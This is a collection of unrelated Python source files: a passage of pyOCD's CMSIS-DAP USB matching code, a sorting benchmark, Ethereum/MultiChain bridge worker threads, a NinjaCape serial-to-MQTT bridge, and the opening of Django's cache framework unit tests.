self._hid_count = hid_interface_count
def __call__(self, interface):
"""! @brief Return True if this is a CMSIS-DAPv1 interface."""
try:
if self._hid_count > 1:
interface_name = usb.util.get_string(interface.device, interface.iInterface)
# This tells us whether the interface is CMSIS-DAP, but not whether it's v1 or v2.
if (interface_name is None) or ("CMSIS-DAP" not in interface_name):
return False
# Now check the interface class to distinguish v1 from v2.
if (interface.bInterfaceClass != USB_CLASS_HID) \
or (interface.bInterfaceSubClass != 0):
return False
# Must have either 1 or 2 endpoints.
if interface.bNumEndpoints not in (1, 2):
return False
# Endpoint 0 must be interrupt in.
if not check_ep(interface, 0, usb.util.ENDPOINT_IN, usb.util.ENDPOINT_TYPE_INTR):
return False
# Endpoint 1 is optional. If present it must be interrupt out.
if (interface.bNumEndpoints == 2) \
and not check_ep(interface, 1, usb.util.ENDPOINT_OUT, usb.util.ENDPOINT_TYPE_INTR):
return False
# All checks passed, this is a CMSIS-DAPv2 interface!
return True
except (UnicodeDecodeError, IndexError):
# UnicodeDecodeError exception can be raised if the device has a corrupted interface name.
# Certain versions of STLinkV2 are known to have this problem. If we can't read the
# interface name, there's no way to tell if it's a CMSIS-DAPv2 interface.
#
# IndexError can be raised if an endpoint is missing.
return False
class FindDap(object):
"""! @brief CMSIS-DAP match class to be used with usb.core.find"""
def __init__(self, serial=None):
"""! @brief Create a new FindDap object with an optional serial number"""
self._serial = serial
def __call__(self, dev):
"""! @brief Return True if this is a DAP device, False otherwise"""
# Check if the device class is a valid one for CMSIS-DAP.
if filter_device_by_class(dev.idVendor, dev.idProduct, dev.bDeviceClass):
return False
try:
# First attempt to get the active config. This produces a more direct error
# when you don't have device permissions on Linux
config = dev.get_active_configuration()
# Now read the product name string.
device_string = dev.product
if (device_string is None) or ("CMSIS-DAP" not in device_string):
return False
# Get count of HID interfaces.
hid_interface_count = len(list(usb.util.find_descriptor(config, find_all=True, bInterfaceClass=USB_CLASS_HID)))
# Find the CMSIS-DAPv1 interface.
matcher = MatchCmsisDapv1Interface(hid_interface_count)
cmsis_dap_interface = usb.util.find_descriptor(config, custom_match=matcher)
except usb.core.USBError as error:
if error.errno == errno.EACCES and platform.system() == "Linux":
msg = ("%s while trying to interrogate a USB device "
"(VID=%04x PID=%04x). This can probably be remedied with a udev rule. "
"See <https://github.com/mbedmicro/pyOCD/tree/master/udev> for help." %
(error, dev.idVendor, dev.idProduct))
# If we recognize this device as one that should be CMSIS-DAP, we can raise
# the level of the log message since it's almost certainly a permissions issue.
if is_known_cmsis_dap_vid_pid(dev.idVendor, dev.idProduct):
LOG.warning(msg)
else:
LOG.debug(msg)
else:
LOG.debug("Error accessing USB device (VID=%04x PID=%04x): %s",
dev.idVendor, dev.idProduct, error)
return False
except (IndexError, NotImplementedError, ValueError, UnicodeDecodeError) as error:
LOG.debug("Error accessing USB device (VID=%04x PID=%04x): %s", dev.idVendor, dev.idProduct, error)
return False
if cmsis_dap_interface is None:
return False
if self._serial is not None:
if self._serial != dev.serial_number:
return False
return True
|
main.py
|
import sys
sys.path.append('..')
from data.generate_data import GenerateData
from threading import Thread
from copy import deepcopy
import ast
import os
from bubble_sort import BubbleSort
from bucket_sort import BucketSort
from heap_sort import HeapSort
from merge_sort import MergeSort
from quick_sort import QuickSort
import time
BUBBLE_SORT = True
BUCKET_SORT = True
HEAP_SORT = True
MERGE_SORT = True
QUICK_SORT = True
def write_result(): pass
def fn_bubble_sort(input, output, start):
bubb_sort = BubbleSort()
bubb_sort.bubble_sort(input)
assert input == output
end = time.time()
def fn_bucket_sort(input, output, start):
buck_sort = BucketSort()
buck_sort.bucket_sort(input)
assert input == output
end = time.time()
def fn_heap_sort(input, output, start):
heap_sort = HeapSort()
heap_sort.heap_sort(input)
assert input == output
end = time.time()
def fn_merge_sort(input, output, start):
m_sort = MergeSort()
m_sort.merge_sort(input)
assert input == output
end = time.time()
def fn_quick_sort(input, output, start):
q_sort = QuickSort()
q_sort.quick_sort(0, len(input) - 1, input)
assert input == output
end = time.time()
def main(size, input, output, thread_name):
fn_sorts = []
if BUBBLE_SORT:
fn_sorts.append(fn_bubble_sort)
if BUCKET_SORT:
fn_sorts.append(fn_bucket_sort)
if HEAP_SORT:
fn_sorts.append(fn_heap_sort)
if MERGE_SORT:
fn_sorts.append(fn_merge_sort)
if QUICK_SORT:
fn_sorts.append(fn_quick_sort)
start = time.time()
for (i_data, o_data) in zip(input, output):
i_data, o_data = ast.literal_eval(i_data), ast.literal_eval(o_data)
for i in range(len(fn_sorts)):
fn_sorts[i](deepcopy(i_data), deepcopy(o_data), time.time())
end = time.time()
print('----------------', thread_name, ' done', '----------------')
print(f'total time: {end - start}s')
if __name__ == '__main__':
count, sizes = 1, [45, 100, 1000]
for size in sizes:
read_training = f'../data/numeric/{size}/train_dataset.csv'
input, output = GenerateData.read_dataset(read_training)
thread_name = f'thread-{count}'
thread = Thread(target=main, args=(size, input, output, thread_name))
thread.setName(thread_name)
print('----------------', thread_name, ' starting', '----------------')
thread.start()
count += 1
else:
sizes = [45, 100, 1000]
for size in sizes:
read_training = f'./data/numeric/{size}/train_dataset.csv'
input, output = GenerateData.read_dataset(read_training)
input, output = ast.literal_eval(input[0]), ast.literal_eval(output[0])
main(size, read_training, input, output)
|
eth_workers.py
|
from web3 import Web3, HTTPProvider
from Savoir import Savoir
from requests import post
from threading import Thread
import time
import json
from conf import *
####On Deposit occurs error - tx fee
if __name__ == "__main__":
eth = Web3(HTTPProvider("http://localhost:"+eport)) # run geth with: geth --rpcapi personal,web3,eth --rpc
versum = Savoir(muser, \
mpassword, \
"localhost", mport, \
mchainname)
url = publicserver+"/eth/"
def refill_raddresses():
"""
Ensures that always deposit addresses are available in the Database
"""
while True:
try:
data = json.dumps({"password":publicserverpassword})
r = post(url + "len/raddress", data).text
if int(r) < 100:
raddress = eth.personal.newAccount("versumtestchain") #some password, because it's required by ethereum
data = json.dumps({"password":publicserverpassword,\
"raddress": raddress})
r = post(url + "set/raddress", data).text
except:
pass
time.sleep(60)
def deposit_worker():
"""
Check every address in database for deposits and executes them
"""
while True:
try:
data = json.dumps({"password":publicserverpassword})
r = post(url + "get/depositdata", data).json()
address_data = r["data"]
for pair in address_data:
raddress = pair[0]
vaddress = pair[1]
value = eth.eth.getBalance(str(raddress))
if value > 0:
data = json.dumps({"raddress": raddress,\
"password":publicserverpassword})
r = post(url + "del/depositdata", data).text
if r == "Success":
print versum.issuemore(vaddress, "ETH", round(eth.fromWei(value,'ether'),7))
print eth.personal.sendTransaction(\
{'to': eth.eth.coinbase,\
'from': raddress, 'value': value-200000000000000}, 'versumtestchain')
except:
pass
time.sleep(60)
def refill_vaddresses():
"""
Ensures that always enough withdraw addresses are available
"""
while True:
try:
data = json.dumps({"password":publicserverpassword})
r = post(url + "len/vaddress", data).text
if int(r) < 100:
vaddress = versum.getnewaddress()
versum.grant(vaddress, "send")
versum.grant(vaddress, "receive")
data = json.dumps({"password":publicserverpassword,\
"vaddress": vaddress})
r = post(url + "set/vaddress", data).text
except:
pass
time.sleep(60)
def withdraw_worker():
"""
Checks every address in database for withdrawals and executes them.
Afterward burns assets
"""
while True:
try:
data = json.dumps({"password":publicserverpassword})
r = post(url + "get/withdrawdata", data).json()
address_data = r["data"]
for pair in address_data:
raddress = pair[1]
vaddress = pair[0]
value_list = versum.getaddressbalances(vaddress)
for asst in value_list:
if asst["name"] == "ETH":
value = float(asst["qty"])
if value > 0:
data = json.dumps({"vaddress": vaddress,\
"password":publicserverpassword})
r = post(url + "del/withdrawdata", data).text
if r == "Success":
print eth.personal.sendTransaction(\
{'to': raddress,\
'from': eth.eth.coinbase, 'value': eth.toWei(value, "ether")-100000000000000}, 'versumtestchain')
print versum.sendassetfrom(vaddress, \
"1XXXXXXXKhXXXXXXTzXXXXXXY6XXXXXXX5UtyF",\
"ETH", value)
except:
pass
time.sleep(60)
def run_all():
Thread(target=refill_raddresses).start()
Thread(target=deposit_worker).start()
Thread(target=refill_vaddresses).start()
Thread(target=withdraw_worker).start()
run_all()
|
ninjaCapeSerialMQTTBridge.py
|
#!/usr/bin/python
#
# used to interface the NinjaCape to openHAB via MQTT
# - reads data from serial port and publishes on MQTT client
# - writes data to serial port from MQTT subscriptions
#
# - uses the Python MQTT client from the Mosquitto project http://mosquitto.org (now in Paho)
#
# https://github.com/perrin7/ninjacape-mqtt-bridge
# perrin7
import serial
import paho.mqtt.client as mqtt
import os
import json
import threading
import time
### Settings
serialdev = '/dev/ttyO1' # for BBB
# serialdev = '/dev/ttyAMA0' # for RPi
broker = "127.0.0.1" # mqtt broker
port = 1883 # mqtt broker port
debug = False ## set this to True for lots of prints
# buffer of data to output to the serial port
outputData = []
#### MQTT callbacks
def on_connect(client, userdata, flags, rc):
if rc == 0:
#rc 0 successful connect
print "Connected"
else:
raise Exception
#subscribe to the output MQTT messages
output_mid = client.subscribe("ninjaCape/output/#")
def on_publish(client, userdata, mid):
if(debug):
print "Published. mid:", mid
def on_subscribe(client, userdata, mid, granted_qos):
if(debug):
print "Subscribed. mid:", mid
def on_message_output(client, userdata, msg):
if(debug):
print "Output Data: ", msg.topic, "data:", msg.payload
#add to outputData list
outputData.append(msg)
def on_message(client, userdata, message):
if(debug):
print "Unhandled Message Received: ", message.topic, message.paylod
#called on exit
#close serial, disconnect MQTT
def cleanup():
print "Ending and cleaning up"
ser.close()
mqttc.disconnect()
def mqtt_to_JSON_output(mqtt_message):
topics = mqtt_message.topic.split('/');
## JSON message in ninjaCape form
json_data = '{"DEVICE": [{"G":"0","V":0,"D":' + topics[2] + ',"DA":"' + mqtt_message.payload + '"}]})'
return json_data
#thread for reading serial data and publishing to MQTT client
def serial_read_and_publish(ser, mqttc):
ser.flushInput()
while True:
line = ser.readline() # this is blocking
if(debug):
print "line to decode:",line
# split the JSON packet up here and publish on MQTT
json_data = json.loads(line)
if(debug):
print "json decoded:",json_data
try:
device = str( json_data['DEVICE'][0]['D'] )
data = str( json_data['DEVICE'][0]['DA'] )
mqttc.publish("ninjaCape/input/"+device, data)
except(KeyError):
# TODO should probably do something here if the data is malformed
pass
############ MAIN PROGRAM START
try:
print "Connecting... ", serialdev
#connect to serial port
ser = serial.Serial(serialdev, 9600, timeout=None) #timeout 0 for non-blocking. Set to None for blocking.
except:
print "Failed to connect serial"
#unable to continue with no serial input
raise SystemExit
try:
#create an mqtt client
mqttc = mqtt.Client("ninjaCape")
#attach MQTT callbacks
mqttc.on_connect = on_connect
mqttc.on_publish = on_publish
mqttc.on_subscribe = on_subscribe
mqttc.on_message = on_message
mqttc.message_callback_add("ninjaCape/output/#", on_message_output)
#connect to broker
mqttc.connect(broker, port, 60)
# start the mqttc client thread
mqttc.loop_start()
serial_thread = threading.Thread(target=serial_read_and_publish, args=(ser, mqttc))
serial_thread.daemon = True
serial_thread.start()
while True: # main thread
#writing to serial port if there is data available
if( len(outputData) > 0 ):
#print "***data to OUTPUT:",mqtt_to_JSON_output(outputData[0])
ser.write(mqtt_to_JSON_output(outputData.pop()))
time.sleep(0.5)
# handle app closure
except (KeyboardInterrupt):
print "Interrupt received"
cleanup()
except (RuntimeError):
print "uh-oh! time to die"
cleanup()
|
tests.py
|
# Unit tests for cache framework
# Uses whatever cache backend is set in the test settings file.
import copy
import io
import os
import pickle
import re
import shutil
import tempfile
import threading
import time
import unittest
from unittest import mock
from django.conf import settings
from django.core import management, signals
from django.core.cache import (
DEFAULT_CACHE_ALIAS, CacheKeyWarning, cache, caches,
)
from django.core.cache.utils import make_template_fragment_key
from django.db import close_old_connections, connection, connections
from django.http import (
HttpRequest, HttpResponse, HttpResponseNotModified, StreamingHttpResponse,
)
from django.middleware.cache import (
CacheMiddleware, FetchFromCacheMiddleware, UpdateCacheMiddleware,
)
from django.middleware.csrf import CsrfViewMiddleware
from django.template import engines
from django.template.context_processors import csrf
from django.template.response import TemplateResponse
from django.test import (
RequestFactory, SimpleTestCase, TestCase, TransactionTestCase,
override_settings,
)
from django.test.signals import setting_changed
from django.utils import timezone, translation
from django.utils.cache import (
get_cache_key, learn_cache_key, patch_cache_control, patch_vary_headers,
)
from django.views.decorators.cache import cache_control, cache_page
from .models import Poll, expensive_calculation
# functions/classes for complex data type tests
def f():
return 42
class C:
def m(n):
return 24
class Unpicklable:
def __getstate__(self):
raise pickle.PickleError()
KEY_ERRORS_WITH_MEMCACHED_MSG = (
'Cache key contains characters that will cause errors if used with '
'memcached: %r'
)
@override_settings(CACHES={
'default': {
'BACKEND': 'django.core.cache.backends.dummy.DummyCache',
}
})
class DummyCacheTests(SimpleTestCase):
# The Dummy cache backend doesn't really behave like a test backend,
# so it has its own test case.
def test_simple(self):
"Dummy cache backend ignores cache set calls"
cache.set("key", "value")
self.assertIsNone(cache.get("key"))
def test_add(self):
"Add doesn't do anything in dummy cache backend"
cache.add("addkey1", "value")
result = cache.add("addkey1", "newvalue")
self.assertTrue(result)
self.assertIsNone(cache.get("addkey1"))
def test_non_existent(self):
"Nonexistent keys aren't found in the dummy cache backend"
self.assertIsNone(cache.get("does_not_exist"))
self.assertEqual(cache.get("does_not_exist", "bang!"), "bang!")
def test_get_many(self):
"get_many returns nothing for the dummy cache backend"
cache.set_many({'a': 'a', 'b': 'b', 'c': 'c', 'd': 'd'})
self.assertEqual(cache.get_many(['a', 'c', 'd']), {})
self.assertEqual(cache.get_many(['a', 'b', 'e']), {})
def test_get_many_invalid_key(self):
with self.assertWarns(CacheKeyWarning, msg=KEY_ERRORS_WITH_MEMCACHED_MSG % 'key with spaces'):
cache.get_many(['key with spaces'])
def test_delete(self):
"Cache deletion is transparently ignored on the dummy cache backend"
cache.set_many({'key1': 'spam', 'key2': 'eggs'})
self.assertIsNone(cache.get("key1"))
cache.delete("key1")
self.assertIsNone(cache.get("key1"))
self.assertIsNone(cache.get("key2"))
def test_has_key(self):
"The has_key method doesn't ever return True for the dummy cache backend"
cache.set("hello1", "goodbye1")
self.assertFalse(cache.has_key("hello1"))
self.assertFalse(cache.has_key("goodbye1"))
def test_in(self):
"The in operator doesn't ever return True for the dummy cache backend"
cache.set("hello2", "goodbye2")
self.assertNotIn("hello2", cache)
self.assertNotIn("goodbye2", cache)
def test_incr(self):
"Dummy cache values can't be incremented"
cache.set('answer', 42)
with self.assertRaises(ValueError):
cache.incr('answer')
with self.assertRaises(ValueError):
cache.incr('does_not_exist')
def test_decr(self):
"Dummy cache values can't be decremented"
cache.set('answer', 42)
with self.assertRaises(ValueError):
cache.decr('answer')
with self.assertRaises(ValueError):
cache.decr('does_not_exist')
def test_touch(self):
"""Dummy cache can't do touch()."""
self.assertIs(cache.touch('whatever'), False)
def test_data_types(self):
"All data types are ignored equally by the dummy cache"
stuff = {
'string': 'this is a string',
'int': 42,
'list': [1, 2, 3, 4],
'tuple': (1, 2, 3, 4),
'dict': {'A': 1, 'B': 2},
'function': f,
'class': C,
}
cache.set("stuff", stuff)
self.assertIsNone(cache.get("stuff"))
def test_expiration(self):
"Expiration has no effect on the dummy cache"
cache.set('expire1', 'very quickly', 1)
cache.set('expire2', 'very quickly', 1)
cache.set('expire3', 'very quickly', 1)
time.sleep(2)
self.assertIsNone(cache.get("expire1"))
cache.add("expire2", "newvalue")
self.assertIsNone(cache.get("expire2"))
self.assertFalse(cache.has_key("expire3"))
def test_unicode(self):
"Unicode values are ignored by the dummy cache"
stuff = {
'ascii': 'ascii_value',
'unicode_ascii': 'Iñtërnâtiônàlizætiøn1',
'Iñtërnâtiônàlizætiøn': 'Iñtërnâtiônàlizætiøn2',
'ascii2': {'x': 1}
}
for (key, value) in stuff.items():
with self.subTest(key=key):
cache.set(key, value)
self.assertIsNone(cache.get(key))
def test_set_many(self):
"set_many does nothing for the dummy cache backend"
self.assertEqual(cache.set_many({'a': 1, 'b': 2}), [])
self.assertEqual(cache.set_many({'a': 1, 'b': 2}, timeout=2, version='1'), [])
def test_set_many_invalid_key(self):
with self.assertWarns(CacheKeyWarning, msg=KEY_ERRORS_WITH_MEMCACHED_MSG % 'key with spaces'):
cache.set_many({'key with spaces': 'foo'})
def test_delete_many(self):
"delete_many does nothing for the dummy cache backend"
cache.delete_many(['a', 'b'])
def test_delete_many_invalid_key(self):
with self.assertWarns(CacheKeyWarning, msg=KEY_ERRORS_WITH_MEMCACHED_MSG % 'key with spaces'):
cache.delete_many({'key with spaces': 'foo'})
def test_clear(self):
"clear does nothing for the dummy cache backend"
cache.clear()
def test_incr_version(self):
"Dummy cache versions can't be incremented"
cache.set('answer', 42)
with self.assertRaises(ValueError):
cache.incr_version('answer')
with self.assertRaises(ValueError):
cache.incr_version('does_not_exist')
def test_decr_version(self):
"Dummy cache versions can't be decremented"
cache.set('answer', 42)
with self.assertRaises(ValueError):
cache.decr_version('answer')
with self.assertRaises(ValueError):
cache.decr_version('does_not_exist')
def test_get_or_set(self):
self.assertEqual(cache.get_or_set('mykey', 'default'), 'default')
self.assertEqual(cache.get_or_set('mykey', None), None)
def test_get_or_set_callable(self):
def my_callable():
return 'default'
self.assertEqual(cache.get_or_set('mykey', my_callable), 'default')
self.assertEqual(cache.get_or_set('mykey', my_callable()), 'default')
def custom_key_func(key, key_prefix, version):
"A customized cache key function"
return 'CUSTOM-' + '-'.join([key_prefix, str(version), key])
_caches_setting_base = {
'default': {},
'prefix': {'KEY_PREFIX': 'cacheprefix{}'.format(os.getpid())},
'v2': {'VERSION': 2},
'custom_key': {'KEY_FUNCTION': custom_key_func},
'custom_key2': {'KEY_FUNCTION': 'cache.tests.custom_key_func'},
'cull': {'OPTIONS': {'MAX_ENTRIES': 30}},
'zero_cull': {'OPTIONS': {'CULL_FREQUENCY': 0, 'MAX_ENTRIES': 30}},
}
def caches_setting_for_tests(base=None, exclude=None, **params):
# `base` is used to pull in the memcached config from the original settings,
# `exclude` is a set of cache names denoting which `_caches_setting_base` keys
# should be omitted.
# `params` are test specific overrides and `_caches_settings_base` is the
# base config for the tests.
# This results in the following search order:
# params -> _caches_setting_base -> base
base = base or {}
exclude = exclude or set()
setting = {k: base.copy() for k in _caches_setting_base if k not in exclude}
for key, cache_params in setting.items():
cache_params.update(_caches_setting_base[key])
cache_params.update(params)
return setting
class BaseCacheTests:
# A common set of tests to apply to all cache backends
factory = RequestFactory()
def tearDown(self):
cache.clear()
def test_simple(self):
# Simple cache set/get works
cache.set("key", "value")
self.assertEqual(cache.get("key"), "value")
def test_default_used_when_none_is_set(self):
"""If None is cached, get() returns it instead of the default."""
cache.set('key_default_none', None)
self.assertIsNone(cache.get('key_default_none', default='default'))
def test_add(self):
# A key can be added to a cache
cache.add("addkey1", "value")
result = cache.add("addkey1", "newvalue")
self.assertFalse(result)
self.assertEqual(cache.get("addkey1"), "value")
def test_prefix(self):
# Test for same cache key conflicts between shared backend
cache.set('somekey', 'value')
# should not be set in the prefixed cache
self.assertFalse(caches['prefix'].has_key('somekey'))
caches['prefix'].set('somekey', 'value2')
self.assertEqual(cache.get('somekey'), 'value')
self.assertEqual(caches['prefix'].get('somekey'), 'value2')
def test_non_existent(self):
"""Nonexistent cache keys return as None/default."""
self.assertIsNone(cache.get("does_not_exist"))
self.assertEqual(cache.get("does_not_exist", "bang!"), "bang!")
def test_get_many(self):
# Multiple cache keys can be returned using get_many
cache.set_many({'a': 'a', 'b': 'b', 'c': 'c', 'd': 'd'})
self.assertEqual(cache.get_many(['a', 'c', 'd']), {'a': 'a', 'c': 'c', 'd': 'd'})
self.assertEqual(cache.get_many(['a', 'b', 'e']), {'a': 'a', 'b': 'b'})
self.assertEqual(cache.get_many(iter(['a', 'b', 'e'])), {'a': 'a', 'b': 'b'})
def test_delete(self):
# Cache keys can be deleted
cache.set_many({'key1': 'spam', 'key2': 'eggs'})
self.assertEqual(cache.get("key1"), "spam")
cache.delete("key1")
self.assertIsNone(cache.get("key1"))
self.assertEqual(cache.get("key2"), "eggs")
def test_has_key(self):
# The cache can be inspected for cache keys
cache.set("hello1", "goodbye1")
self.assertTrue(cache.has_key("hello1"))
self.assertFalse(cache.has_key("goodbye1"))
cache.set("no_expiry", "here", None)
self.assertTrue(cache.has_key("no_expiry"))
def test_in(self):
# The in operator can be used to inspect cache contents
cache.set("hello2", "goodbye2")
self.assertIn("hello2", cache)
self.assertNotIn("goodbye2", cache)
def test_incr(self):
# Cache values can be incremented
cache.set('answer', 41)
self.assertEqual(cache.incr('answer'), 42)
self.assertEqual(cache.get('answer'), 42)
self.assertEqual(cache.incr('answer', 10), 52)
self.assertEqual(cache.get('answer'), 52)
self.assertEqual(cache.incr('answer', -10), 42)
with self.assertRaises(ValueError):
cache.incr('does_not_exist')
def test_decr(self):
# Cache values can be decremented
cache.set('answer', 43)
self.assertEqual(cache.decr('answer'), 42)
self.assertEqual(cache.get('answer'), 42)
self.assertEqual(cache.decr('answer', 10), 32)
self.assertEqual(cache.get('answer'), 32)
self.assertEqual(cache.decr('answer', -10), 42)
with self.assertRaises(ValueError):
cache.decr('does_not_exist')
def test_close(self):
self.assertTrue(hasattr(cache, 'close'))
cache.close()
def test_data_types(self):
# Many different data types can be cached
stuff = {
'string': 'this is a string',
'int': 42,
'list': [1, 2, 3, 4],
'tuple': (1, 2, 3, 4),
'dict': {'A': 1, 'B': 2},
'function': f,
'class': C,
}
cache.set("stuff", stuff)
self.assertEqual(cache.get("stuff"), stuff)
def test_cache_read_for_model_instance(self):
# Don't want fields with callable as default to be called on cache read
expensive_calculation.num_runs = 0
Poll.objects.all().delete()
my_poll = Poll.objects.create(question="Well?")
self.assertEqual(Poll.objects.count(), 1)
pub_date = my_poll.pub_date
cache.set('question', my_poll)
cached_poll = cache.get('question')
self.assertEqual(cached_poll.pub_date, pub_date)
# We only want the default expensive calculation run once
self.assertEqual(expensive_calculation.num_runs, 1)
def test_cache_write_for_model_instance_with_deferred(self):
# Don't want fields with callable as default to be called on cache write
expensive_calculation.num_runs = 0
Poll.objects.all().delete()
Poll.objects.create(question="What?")
self.assertEqual(expensive_calculation.num_runs, 1)
defer_qs = Poll.objects.all().defer('question')
self.assertEqual(defer_qs.count(), 1)
self.assertEqual(expensive_calculation.num_runs, 1)
cache.set('deferred_queryset', defer_qs)
# cache set should not re-evaluate default functions
self.assertEqual(expensive_calculation.num_runs, 1)
def test_cache_read_for_model_instance_with_deferred(self):
# Don't want fields with callable as default to be called on cache read
expensive_calculation.num_runs = 0
Poll.objects.all().delete()
Poll.objects.create(question="What?")
self.assertEqual(expensive_calculation.num_runs, 1)
defer_qs = Poll.objects.all().defer('question')
self.assertEqual(defer_qs.count(), 1)
cache.set('deferred_queryset', defer_qs)
self.assertEqual(expensive_calculation.num_runs, 1)
runs_before_cache_read = expensive_calculation.num_runs
cache.get('deferred_queryset')
# We only want the default expensive calculation run on creation and set
self.assertEqual(expensive_calculation.num_runs, runs_before_cache_read)
def test_expiration(self):
# Cache values can be set to expire
cache.set('expire1', 'very quickly', 1)
cache.set('expire2', 'very quickly', 1)
cache.set('expire3', 'very quickly', 1)
time.sleep(2)
self.assertIsNone(cache.get("expire1"))
cache.add("expire2", "newvalue")
self.assertEqual(cache.get("expire2"), "newvalue")
self.assertFalse(cache.has_key("expire3"))
def test_touch(self):
# cache.touch() updates the timeout.
cache.set('expire1', 'very quickly', timeout=1)
self.assertIs(cache.touch('expire1', timeout=4), True)
time.sleep(2)
self.assertTrue(cache.has_key('expire1'))
time.sleep(3)
self.assertFalse(cache.has_key('expire1'))
# cache.touch() works without the timeout argument.
cache.set('expire1', 'very quickly', timeout=1)
self.assertIs(cache.touch('expire1'), True)
time.sleep(2)
self.assertTrue(cache.has_key('expire1'))
self.assertIs(cache.touch('nonexistent'), False)
def test_unicode(self):
# Unicode values can be cached
stuff = {
'ascii': 'ascii_value',
'unicode_ascii': 'Iñtërnâtiônàlizætiøn1',
'Iñtërnâtiônàlizætiøn': 'Iñtërnâtiônàlizætiøn2',
'ascii2': {'x': 1}
}
# Test `set`
for (key, value) in stuff.items():
with self.subTest(key=key):
cache.set(key, value)
self.assertEqual(cache.get(key), value)
# Test `add`
for (key, value) in stuff.items():
with self.subTest(key=key):
cache.delete(key)
cache.add(key, value)
self.assertEqual(cache.get(key), value)
# Test `set_many`
for (key, value) in stuff.items():
cache.delete(key)
cache.set_many(stuff)
for (key, value) in stuff.items():
with self.subTest(key=key):
self.assertEqual(cache.get(key), value)
def test_binary_string(self):
# Binary strings should be cacheable
from zlib import compress, decompress
value = 'value_to_be_compressed'
compressed_value = compress(value.encode())
# Test set
cache.set('binary1', compressed_value)
compressed_result = cache.get('binary1')
self.assertEqual(compressed_value, compressed_result)
self.assertEqual(value, decompress(compressed_result).decode())
# Test add
cache.add('binary1-add', compressed_value)
compressed_result = cache.get('binary1-add')
self.assertEqual(compressed_value, compressed_result)
self.assertEqual(value, decompress(compressed_result).decode())
# Test set_many
cache.set_many({'binary1-set_many': compressed_value})
compressed_result = cache.get('binary1-set_many')
self.assertEqual(compressed_value, compressed_result)
self.assertEqual(value, decompress(compressed_result).decode())
def test_set_many(self):
# Multiple keys can be set using set_many
cache.set_many({"key1": "spam", "key2": "eggs"})
self.assertEqual(cache.get("key1"), "spam")
self.assertEqual(cache.get("key2"), "eggs")
def test_set_many_returns_empty_list_on_success(self):
"""set_many() returns an empty list when all keys are inserted."""
failing_keys = cache.set_many({'key1': 'spam', 'key2': 'eggs'})
self.assertEqual(failing_keys, [])
def test_set_many_expiration(self):
# set_many takes a second ``timeout`` parameter
cache.set_many({"key1": "spam", "key2": "eggs"}, 1)
time.sleep(2)
self.assertIsNone(cache.get("key1"))
self.assertIsNone(cache.get("key2"))
def test_delete_many(self):
# Multiple keys can be deleted using delete_many
cache.set_many({'key1': 'spam', 'key2': 'eggs', 'key3': 'ham'})
cache.delete_many(["key1", "key2"])
self.assertIsNone(cache.get("key1"))
self.assertIsNone(cache.get("key2"))
self.assertEqual(cache.get("key3"), "ham")
def test_clear(self):
# The cache can be emptied using clear
cache.set_many({'key1': 'spam', 'key2': 'eggs'})
cache.clear()
self.assertIsNone(cache.get("key1"))
self.assertIsNone(cache.get("key2"))
def test_long_timeout(self):
"""
Followe memcached's convention where a timeout greater than 30 days is
treated as an absolute expiration timestamp instead of a relative
offset (#12399).
"""
cache.set('key1', 'eggs', 60 * 60 * 24 * 30 + 1) # 30 days + 1 second
self.assertEqual(cache.get('key1'), 'eggs')
cache.add('key2', 'ham', 60 * 60 * 24 * 30 + 1)
self.assertEqual(cache.get('key2'), 'ham')
cache.set_many({'key3': 'sausage', 'key4': 'lobster bisque'}, 60 * 60 * 24 * 30 + 1)
self.assertEqual(cache.get('key3'), 'sausage')
self.assertEqual(cache.get('key4'), 'lobster bisque')
def test_forever_timeout(self):
"""
Passing in None into timeout results in a value that is cached forever
"""
cache.set('key1', 'eggs', None)
self.assertEqual(cache.get('key1'), 'eggs')
cache.add('key2', 'ham', None)
self.assertEqual(cache.get('key2'), 'ham')
added = cache.add('key1', 'new eggs', None)
self.assertIs(added, False)
self.assertEqual(cache.get('key1'), 'eggs')
cache.set_many({'key3': 'sausage', 'key4': 'lobster bisque'}, None)
self.assertEqual(cache.get('key3'), 'sausage')
self.assertEqual(cache.get('key4'), 'lobster bisque')
cache.set('key5', 'belgian fries', timeout=1)
cache.touch('key5', timeout=None)
time.sleep(2)
self.assertEqual(cache.get('key5'), 'belgian fries')
def test_zero_timeout(self):
"""
Passing in zero into timeout results in a value that is not cached
"""
cache.set('key1', 'eggs', 0)
self.assertIsNone(cache.get('key1'))
cache.add('key2', 'ham', 0)
self.assertIsNone(cache.get('key2'))
cache.set_many({'key3': 'sausage', 'key4': 'lobster bisque'}, 0)
self.assertIsNone(cache.get('key3'))
self.assertIsNone(cache.get('key4'))
cache.set('key5', 'belgian fries', timeout=5)
cache.touch('key5', timeout=0)
self.assertIsNone(cache.get('key5'))
def test_float_timeout(self):
# Make sure a timeout given as a float doesn't crash anything.
cache.set("key1", "spam", 100.2)
self.assertEqual(cache.get("key1"), "spam")
def _perform_cull_test(self, cull_cache, initial_count, final_count):
# Create initial cache key entries. This will overflow the cache,
# causing a cull.
for i in range(1, initial_count):
cull_cache.set('cull%d' % i, 'value', 1000)
count = 0
# Count how many keys are left in the cache.
for i in range(1, initial_count):
if cull_cache.has_key('cull%d' % i):
count += 1
self.assertEqual(count, final_count)
def test_cull(self):
self._perform_cull_test(caches['cull'], 50, 29)
def test_zero_cull(self):
self._perform_cull_test(caches['zero_cull'], 50, 19)
def _perform_invalid_key_test(self, key, expected_warning):
"""
All the builtin backends (except memcached, see below) should warn on
keys that would be refused by memcached. This encourages portable
caching code without making it too difficult to use production backends
with more liberal key rules. Refs #6447.
"""
# mimic custom ``make_key`` method being defined since the default will
# never show the below warnings
def func(key, *args):
return key
old_func = cache.key_func
cache.key_func = func
try:
with self.assertWarnsMessage(CacheKeyWarning, expected_warning):
cache.set(key, 'value')
finally:
cache.key_func = old_func
def test_invalid_key_characters(self):
# memcached doesn't allow whitespace or control characters in keys.
key = 'key with spaces and 清'
self._perform_invalid_key_test(key, KEY_ERRORS_WITH_MEMCACHED_MSG % key)
def test_invalid_key_length(self):
# memcached limits key length to 250.
key = ('a' * 250) + '清'
expected_warning = (
'Cache key will cause errors if used with memcached: '
'%r (longer than %s)' % (key, 250)
)
self._perform_invalid_key_test(key, expected_warning)
def test_cache_versioning_get_set(self):
# set, using default version = 1
cache.set('answer1', 42)
self.assertEqual(cache.get('answer1'), 42)
self.assertEqual(cache.get('answer1', version=1), 42)
self.assertIsNone(cache.get('answer1', version=2))
self.assertIsNone(caches['v2'].get('answer1'))
self.assertEqual(caches['v2'].get('answer1', version=1), 42)
self.assertIsNone(caches['v2'].get('answer1', version=2))
# set, default version = 1, but manually override version = 2
cache.set('answer2', 42, version=2)
self.assertIsNone(cache.get('answer2'))
self.assertIsNone(cache.get('answer2', version=1))
